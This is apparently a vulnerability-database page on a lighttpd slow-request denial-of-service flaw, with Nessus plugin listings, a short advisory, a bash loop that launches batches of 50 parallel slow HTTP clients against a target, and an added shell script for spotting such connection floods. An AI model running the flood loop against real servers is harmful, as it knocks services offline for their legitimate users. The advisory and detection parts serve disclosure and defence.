The 'lighttpd' webserver is vulnerable to a denial-of-service attack due to slow request handling
Reporter | Title | Published | Family |
---|---|---|---|
Tenable Nessus | GLSA-201006-17 : lighttpd: Denial of Service | 4 Jun 2010 00:00 | nessus |
Tenable Nessus | Fedora 12 : lighttpd-1.4.26-2.fc12 (2010-7643) | 1 Jul 2010 00:00 | nessus |
Tenable Nessus | lighttpd < 1.4.26 or 1.5.0 Denial of Service | 6 Feb 2018 00:00 | nessus |
Tenable Nessus | Fedora 13 : lighttpd-1.4.26-2.fc13 (2010-7611) | 1 Jul 2010 00:00 | nessus |
Tenable Nessus | Fedora 11 : lighttpd-1.4.26-2.fc11 (2010-7636) | 1 Jul 2010 00:00 | nessus |
Tenable Nessus | Debian DSA-1987-1 : lighttpd - denial of service | 24 Feb 2010 00:00 | nessus |
Tenable Nessus | openSUSE Security Update : lighttpd (lighttpd-1914) | 9 Feb 2010 00:00 | nessus |
Tenable Nessus | FreeBSD : lighttpd -- denial of service vulnerability (1a3bd81f-1b25-11df-bd1a-002170daae37) | 17 Feb 2010 00:00 | nessus |
Tenable Nessus | openSUSE Security Update : lighttpd (lighttpd-1914) | 9 Feb 2010 00:00 | nessus |
Tenable Nessus | openSUSE Security Update : lighttpd (lighttpd-1914) | 9 Feb 2010 00:00 | nessus |
source: https://www.securityfocus.com/bid/38036/info
The 'lighttpd' webserver is prone to a denial-of-service vulnerability.
Remote attackers can exploit this issue to cause the application to hang, denying service to legitimate users.
```bash
## slow_test.sh
for ((j=0; j<1000; j++)) do
    for ((i=0; i<50; i++)) do
        ## slow_client is a C program which sends a HTTP request very slowly
        ./slow_client http://www.example.com/ >/dev/null 2>/dev/null &
    done &
    sleep 3
done
```
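
For defenders, one way to spot the connection pattern the script above produces (batches of 50 parallel slow requests from one client) is to count established connections per peer on the web port. This is an added example, not part of the original advisory; the function names, the threshold of 50 and the sample rows are assumptions, and the input is assumed to be in the column layout printed by `ss -tn`.

```shell
#!/bin/sh
# Added example (not from the advisory): flag peers that hold many
# simultaneous established connections to the web server port.

# Constructed sample rows in `ss -tn` layout:
#   State Recv-Q Send-Q Local-Address:Port Peer-Address:Port
sample_ss_output() {
    echo "State Recv-Q Send-Q Local Address:Port Peer Address:Port"
    i=0
    while [ "$i" -lt 50 ]; do
        # One client holding 50 connections open at once (documentation IPs).
        echo "ESTAB 0 0 192.0.2.10:80 198.51.100.7:$((40000 + i))"
        i=$((i + 1))
    done
    echo "ESTAB 0 0 192.0.2.10:80 203.0.113.5:51000"
    echo "ESTAB 0 0 192.0.2.10:80 203.0.113.5:51001"
    echo "ESTAB 0 0 192.0.2.10:22 198.51.100.7:52000"
    echo "TIME-WAIT 0 0 192.0.2.10:80 203.0.113.9:53000"
}

# flag_heavy_peers PORT THRESHOLD
# Reads `ss -tn` rows on stdin and prints "count peer" for every peer with at
# least THRESHOLD established connections to local PORT, busiest first.
flag_heavy_peers() {
    awk -v port="$1" -v min="$2" '
        $1 == "ESTAB" {
            n = split($4, loc, ":")          # last field is the local port
            if (loc[n] != port) next
            peer = $5
            sub(/:[0-9]+$/, "", peer)        # drop the ephemeral peer port
            count[peer]++
        }
        END {
            for (p in count)
                if (count[p] >= min) print count[p], p
        }
    ' | sort -rn
}

# Live use (assumes iproute2 `ss` is installed):
#   ss -tn | flag_heavy_peers 80 50
```

A high count alone is a heuristic: clients behind a shared NAT or proxy can legitimately exceed the threshold, so treat flagged peers as candidates for rate limiting or closer inspection.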